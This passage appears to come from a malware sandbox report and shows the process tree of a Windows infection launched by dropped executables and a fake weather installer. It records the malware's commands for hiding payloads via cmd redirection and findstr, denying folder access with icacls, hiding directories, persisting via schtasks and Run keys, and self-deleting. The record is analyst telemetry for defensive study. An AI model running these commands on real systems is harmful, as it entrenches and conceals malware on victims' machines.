                                          6⤵
                                          • Executes dropped EXE
                                          PID:4384
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c echo yLBUjKkTN
                                            7⤵
                                              PID:5468
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe < Infervora.aac
                                              7⤵
                                                PID:2540
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe
                                                  8⤵
                                                    PID:4932
                                                    • C:\Users\Admin\AppData\Roaming\wVDJwIWFIeypECF\Scorso.exe.com
                                                      Scorso.exe.com c
                                                      9⤵
                                                        PID:6600
                                                        • C:\Users\Admin\AppData\Roaming\wVDJwIWFIeypECF\Scorso.exe.com
                                                          C:\Users\Admin\AppData\Roaming\wVDJwIWFIeypECF\Scorso.exe.com c
                                                          10⤵
                                                          • Drops startup file
                                                          • Suspicious use of SetThreadContext
                                                          PID:4376
                                                          • C:\Users\Admin\AppData\Roaming\wVDJwIWFIeypECF\Scorso.exe.com
                                                            C:\Users\Admin\AppData\Roaming\wVDJwIWFIeypECF\Scorso.exe.com
                                                            11⤵
                                                            • Drops startup file
                                                            • Maps connected drives based on registry
                                                            • Checks SCSI registry key(s)
                                                            PID:5500
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\del.bat
                                                              12⤵
                                                                PID:6292
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping localhost -n 3
                                                                  13⤵
                                                                  • Runs ping.exe
                                                                  PID:7100
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c del "C:\Users\Admin\AppData\Roaming\del.bat"
                                                                  13⤵
                                                                    PID:4328
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34264.exe
                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34264.exe"
                                                                  12⤵
                                                                  • Modifies registry class
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:1788
                                                          • C:\Windows\SysWOW64\PING.EXE
                                                            ping 127.0.0.1 -n 30
                                                            9⤵
                                                            • Runs ping.exe
                                                            PID:6412
                                                    • C:\Users\Admin\Documents\R7lcJ5bxH0SIBKkSkPBD5K03.exe
                                                      "C:\Users\Admin\Documents\R7lcJ5bxH0SIBKkSkPBD5K03.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:4128
                                                      • C:\Users\Admin\Documents\R7lcJ5bxH0SIBKkSkPBD5K03.exe
                                                        "C:\Users\Admin\Documents\R7lcJ5bxH0SIBKkSkPBD5K03.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:4876
                                                    • C:\Users\Admin\Documents\vh7HeUVwQFJ8E67dkI1rYNP9.exe
                                                      "C:\Users\Admin\Documents\vh7HeUVwQFJ8E67dkI1rYNP9.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:4364
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{QZgX-lCL4i-rkMv-sRpEM}\32629643177.exe"
                                                        7⤵
                                                          PID:4752
                                                          • C:\Users\Admin\AppData\Local\Temp\{QZgX-lCL4i-rkMv-sRpEM}\32629643177.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\{QZgX-lCL4i-rkMv-sRpEM}\32629643177.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            PID:5692
                                                            • C:\Windows\SysWOW64\icacls.exe
                                                              icacls "C:\Users\Admin\AppData\Local\769c091c-75e9-4144-94ef-2ef38165d06d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                              9⤵
                                                              • Modifies file permissions
                                                              PID:4952
                                                            • C:\Users\Admin\AppData\Local\Temp\{QZgX-lCL4i-rkMv-sRpEM}\32629643177.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\{QZgX-lCL4i-rkMv-sRpEM}\32629643177.exe" --Admin IsNotAutoStart IsNotTask
                                                              9⤵
                                                              • Executes dropped EXE
                                                              PID:2004
                                                              • C:\Users\Admin\AppData\Local\b7b8331f-1700-4369-b0c1-998e0a519439\updatewin.exe
                                                                "C:\Users\Admin\AppData\Local\b7b8331f-1700-4369-b0c1-998e0a519439\updatewin.exe"
                                                                10⤵
                                                                • Executes dropped EXE
                                                                PID:6560
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\b7b8331f-1700-4369-b0c1-998e0a519439\updatewin.exe
                                                                  11⤵
                                                                    PID:6672
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /t 3
                                                                      12⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:6836
                                                                • C:\Users\Admin\AppData\Local\b7b8331f-1700-4369-b0c1-998e0a519439\5.exe
                                                                  "C:\Users\Admin\AppData\Local\b7b8331f-1700-4369-b0c1-998e0a519439\5.exe"
                                                                  10⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Checks processor information in registry
                                                                  PID:6612
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{QZgX-lCL4i-rkMv-sRpEM}\33789938885.exe" /mix
                                                            7⤵
                                                              PID:1244
                                                              • C:\Users\Admin\AppData\Local\Temp\{QZgX-lCL4i-rkMv-sRpEM}\33789938885.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\{QZgX-lCL4i-rkMv-sRpEM}\33789938885.exe" /mix
                                                                8⤵
                                                                • Executes dropped EXE
                                                                • Checks processor information in registry
                                                                PID:5520
                                                                • C:\Users\Admin\AppData\Local\Temp\Joirk.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Joirk.exe"
                                                                  9⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:7052
                                                                  • C:\Users\Admin\AppData\Local\Temp\New Feature\5.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\New Feature\5.exe"
                                                                    10⤵
                                                                    • Executes dropped EXE
                                                                    • Modifies registry class
                                                                    PID:7136
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\Admin\AppData\Local\Disk" /inheritance:e /deny "Admin:(R,REA,RA,RD)" & attrib +s +h "C:\Users\Admin\AppData\Local\Disk" & schtasks /create /tn \Services\Diagnostic /tr "'C:\Users\Admin\AppData\Local\Disk\AutoIt3\AutoIt3_x64.exe' 'C:\Users\Admin\AppData\Local\Disk\AutoIt3\Settings.au3'" /st 00:04 /du 9906:30 /sc once /ri 1 /f
                                                                      11⤵
                                                                        PID:6768
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls "C:\Users\Admin\AppData\Local\Disk" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
                                                                          12⤵
                                                                          • Modifies file permissions
                                                                          PID:6816
                                                                        • C:\Windows\system32\attrib.exe
                                                                          attrib +s +h "C:\Users\Admin\AppData\Local\Disk"
                                                                          12⤵
                                                                          • Views/modifies file attributes
                                                                          PID:6692
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks /create /tn \Services\Diagnostic /tr "'C:\Users\Admin\AppData\Local\Disk\AutoIt3\AutoIt3_x64.exe' 'C:\Users\Admin\AppData\Local\Disk\AutoIt3\Settings.au3'" /st 00:04 /du 9906:30 /sc once /ri 1 /f
                                                                          12⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:7056
                                                                      • C:\Windows\System32\WScript.exe
                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Ketoger.vbs"
                                                                        11⤵
                                                                          PID:4896
                                                                        • C:\Windows\system32\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe" /c timeout /t 2 & del /f /q "C:\Users\Admin\AppData\Local\Temp\New Feature\5.exe"
                                                                          11⤵
                                                                            PID:4148
                                                                            • C:\Windows\system32\timeout.exe
                                                                              timeout /t 2
                                                                              12⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:6364
                                                                        • C:\Users\Admin\AppData\Local\Temp\New Feature\vpn.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\New Feature\vpn.exe"
                                                                          10⤵
                                                                          • Executes dropped EXE
                                                                          PID:7128
                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                            "C:\Windows\System32\svchost.exe"
                                                                            11⤵
                                                                              PID:4636
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c CmD < Cio.mui
                                                                              11⤵
                                                                                PID:6240
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  CmD
                                                                                  12⤵
                                                                                    PID:4444
                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                      findstr /V /R "^fTkdrHjFEjwWTnaFQZKCJUbogcoqzbtiLFmPvaUydHTDDOhZbsHYKSsccreInjjioUkhYDontFkwqUEm$" Uno.mui
                                                                                      13⤵
                                                                                        PID:2212
                                                                                      • C:\Users\Admin\AppData\Roaming\yApPLqrLEZwNzecsF\Dattero.exe.com
                                                                                        Dattero.exe.com T
                                                                                        13⤵
                                                                                          PID:5760
                                                                                          • C:\Users\Admin\AppData\Roaming\yApPLqrLEZwNzecsF\Dattero.exe.com
                                                                                            C:\Users\Admin\AppData\Roaming\yApPLqrLEZwNzecsF\Dattero.exe.com T
                                                                                            14⤵
                                                                                            • Checks processor information in registry
                                                                                            PID:4108
                                                                                            • C:\Users\Admin\AppData\Local\Temp\gwrdgwt.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\gwrdgwt.exe"
                                                                                              15⤵
                                                                                                PID:6880
                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\drrampcps.vbs"
                                                                                                15⤵
                                                                                                  PID:6368
                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\qwoilqoe.vbs"
                                                                                                  15⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  PID:60
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping 127.0.0.1 -n 30
                                                                                              13⤵
                                                                                              • Runs ping.exe
                                                                                              PID:7096
                                                                                      • C:\Users\Admin\AppData\Local\Temp\New Feature\6.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\New Feature\6.exe"
                                                                                        10⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:7120
                                                                                        • C:\Windows\SysWOW64\svchost.exe
                                                                                          "C:\Windows\System32\svchost.exe"
                                                                                          11⤵
                                                                                            PID:2428
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c CmD < Estate.mp4
                                                                                            11⤵
                                                                                              PID:6492
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                CmD
                                                                                                12⤵
                                                                                                  PID:6608
                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                    findstr /V /R "^FpFXINiXlHsfyFEsvZCPXhrqdCpMSTWpvJNBLUiUEvlyOwaYKXlKfeGauFHyDxysKoSvRrGCRHkBeXkglleUJjUxecxujwdpsTcGoWiGsHSHQydpzzVzalIb$" Divine.mp4
                                                                                                    13⤵
                                                                                                      PID:4144
                                                                                                    • C:\Users\Admin\AppData\Roaming\FEoIQQWzvYrooBdnhz\Avvertire.exe.com
                                                                                                      Avvertire.exe.com s
                                                                                                      13⤵
                                                                                                        PID:6752
                                                                                                        • C:\Users\Admin\AppData\Roaming\FEoIQQWzvYrooBdnhz\Avvertire.exe.com
                                                                                                          C:\Users\Admin\AppData\Roaming\FEoIQQWzvYrooBdnhz\Avvertire.exe.com s
                                                                                                          14⤵
                                                                                                            PID:6584
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\system32\cmd.exe" /c rd /s /q C:\ProgramData\dhpmhnvtfdtk & timeout 2 & del /f /q "C:\Users\Admin\AppData\Roaming\FEoIQQWzvYrooBdnhz\Avvertire.exe.com"
                                                                                                              15⤵
                                                                                                                PID:5832
                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                  timeout 2
                                                                                                                  16⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:6280
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /c rd /s /q C:\ProgramData\dhpmhnvtfdtk & timeout 2 & del /f /q "C:\Users\Admin\AppData\Roaming\FEoIQQWzvYrooBdnhz\Avvertire.exe.com"
                                                                                                                15⤵
                                                                                                                  PID:2588
                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                    timeout 2
                                                                                                                    16⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:4728
                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                              ping 127.0.0.1 -n 30
                                                                                                              13⤵
                                                                                                              • Runs ping.exe
                                                                                                              PID:4396
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\New Feature\4.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\New Feature\4.exe"
                                                                                                        10⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops startup file
                                                                                                        PID:7112
                                                                                                        • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                          11⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious behavior: AddClipboardFormatListener
                                                                                                          PID:2836
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\jAtYuoScY & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{QZgX-lCL4i-rkMv-sRpEM}\33789938885.exe"
                                                                                                      9⤵
                                                                                                        PID:7060
                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                          timeout 3
                                                                                                          10⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:4664
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "vh7HeUVwQFJ8E67dkI1rYNP9.exe" /f & erase "C:\Users\Admin\Documents\vh7HeUVwQFJ8E67dkI1rYNP9.exe" & exit
                                                                                                    7⤵
                                                                                                      PID:2700
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /im "vh7HeUVwQFJ8E67dkI1rYNP9.exe" /f
                                                                                                        8⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:5384
                                                                                                  • C:\Users\Admin\Documents\IW8rpmDMAI2Q1lgsTio323ro.exe
                                                                                                    "C:\Users\Admin\Documents\IW8rpmDMAI2Q1lgsTio323ro.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4732
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c echo yLBUjKkTN
                                                                                                      7⤵
                                                                                                        PID:5076
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe < Infervora.aac
                                                                                                        7⤵
                                                                                                          PID:5620
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe
                                                                                                            8⤵
                                                                                                              PID:4868
                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                findstr /V /R "^CqhAYgTvATlPdcvCeYviHwPmfncbDHATHrSjQXXQMoqHcgpelcLwzOfAlNlASvSSasohCpMyqGcnworqfzhiWmASNserNbXdfigtuVmqJFwMzQmeJpkmpLVTRfAkiIsDItpTTZUzUjndbNmWSq$" Rivedervi.psd
                                                                                                                9⤵
                                                                                                                  PID:5380
                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                  ping 127.0.0.1 -n 30
                                                                                                                  9⤵
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:5540
                                                                                                          • C:\Users\Admin\Documents\oUC8C1yEzRwmu4lDldoZNwwe.exe
                                                                                                            "C:\Users\Admin\Documents\oUC8C1yEzRwmu4lDldoZNwwe.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:4808
                                                                                                            • C:\Users\Admin\Documents\oUC8C1yEzRwmu4lDldoZNwwe.exe
                                                                                                              "C:\Users\Admin\Documents\oUC8C1yEzRwmu4lDldoZNwwe.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5948
                                                                                                          • C:\Users\Admin\Documents\HrHWvQqolofnoplfxRKcMijv.exe
                                                                                                            "C:\Users\Admin\Documents\HrHWvQqolofnoplfxRKcMijv.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4720
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{zMkU-no8fh-A8KL-XGPNd}\22897170105.exe"
                                                                                                              7⤵
                                                                                                                PID:5552
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\{zMkU-no8fh-A8KL-XGPNd}\22897170105.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\{zMkU-no8fh-A8KL-XGPNd}\22897170105.exe"
                                                                                                                  8⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:500
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\{zMkU-no8fh-A8KL-XGPNd}\22897170105.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\{zMkU-no8fh-A8KL-XGPNd}\22897170105.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                    9⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5492
                                                                                                                    • C:\Users\Admin\AppData\Local\93679a0b-1d86-45d5-bdaf-0d1371494f0b\updatewin.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\93679a0b-1d86-45d5-bdaf-0d1371494f0b\updatewin.exe"
                                                                                                                      10⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4836
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\93679a0b-1d86-45d5-bdaf-0d1371494f0b\updatewin.exe
                                                                                                                        11⤵
                                                                                                                          PID:6540
                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                            timeout /t 3
                                                                                                                            12⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:6652
                                                                                                                      • C:\Users\Admin\AppData\Local\93679a0b-1d86-45d5-bdaf-0d1371494f0b\5.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\93679a0b-1d86-45d5-bdaf-0d1371494f0b\5.exe"
                                                                                                                        10⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Checks processor information in registry
                                                                                                                        PID:4972
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\93679a0b-1d86-45d5-bdaf-0d1371494f0b\5.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                          11⤵
                                                                                                                            PID:6912
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /im 5.exe /f
                                                                                                                              12⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:6964
                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                              timeout /t 6
                                                                                                                              12⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:6992
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{zMkU-no8fh-A8KL-XGPNd}\96596870514.exe" /mix
                                                                                                                    7⤵
                                                                                                                      PID:4292
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\{zMkU-no8fh-A8KL-XGPNd}\96596870514.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\{zMkU-no8fh-A8KL-XGPNd}\96596870514.exe" /mix
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks processor information in registry
                                                                                                                        PID:5096
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\bVflDjECFiyh & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{zMkU-no8fh-A8KL-XGPNd}\96596870514.exe"
                                                                                                                          9⤵
                                                                                                                            PID:6340
                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                              timeout 3
                                                                                                                              10⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:6404
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "HrHWvQqolofnoplfxRKcMijv.exe" /f & erase "C:\Users\Admin\Documents\HrHWvQqolofnoplfxRKcMijv.exe" & exit
                                                                                                                        7⤵
                                                                                                                          PID:3612
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /im "HrHWvQqolofnoplfxRKcMijv.exe" /f
                                                                                                                            8⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:4660
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                              1⤵
                                                                                                              • Drops file in Windows directory
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:4156
                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                              1⤵
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              PID:4272
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:4492
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                                PID:4632
                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                1⤵
                                                                                                                  PID:5320
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                  1⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:6020
                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                  PID:6104
                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                  1⤵
                                                                                                                  • Enumerates connected drives
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:5268
                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 2335313A8812EBC3E9CACC10D3E09D0F C
                                                                                                                    2⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:5248
                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 76FD731BCDAFC3F4B7DE3AFA342AE915
                                                                                                                    2⤵
                                                                                                                    • Blocklisted process makes network request
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:4176
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                    2⤵
                                                                                                                    • Adds Run key to start application
                                                                                                                    • Drops file in Windows directory
                                                                                                                    PID:5640
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
                                                                                                                      3⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Adds Run key to start application
                                                                                                                      PID:5496
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
                                                                                                                        4⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:4904
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                          C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7fff66ad9ec0,0x7fff66ad9ed0,0x7fff66ad9ee0
                                                                                                                          5⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:6764
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                            C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff707e54e60,0x7ff707e54e70,0x7ff707e54e80
                                                                                                                            6⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:2796
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1820,177586632822513674,15622691182948822665,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4904_210696988" --mojo-platform-channel-handle=1912 /prefetch:8
                                                                                                                          5⤵
                                                                                                                            PID:4776
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
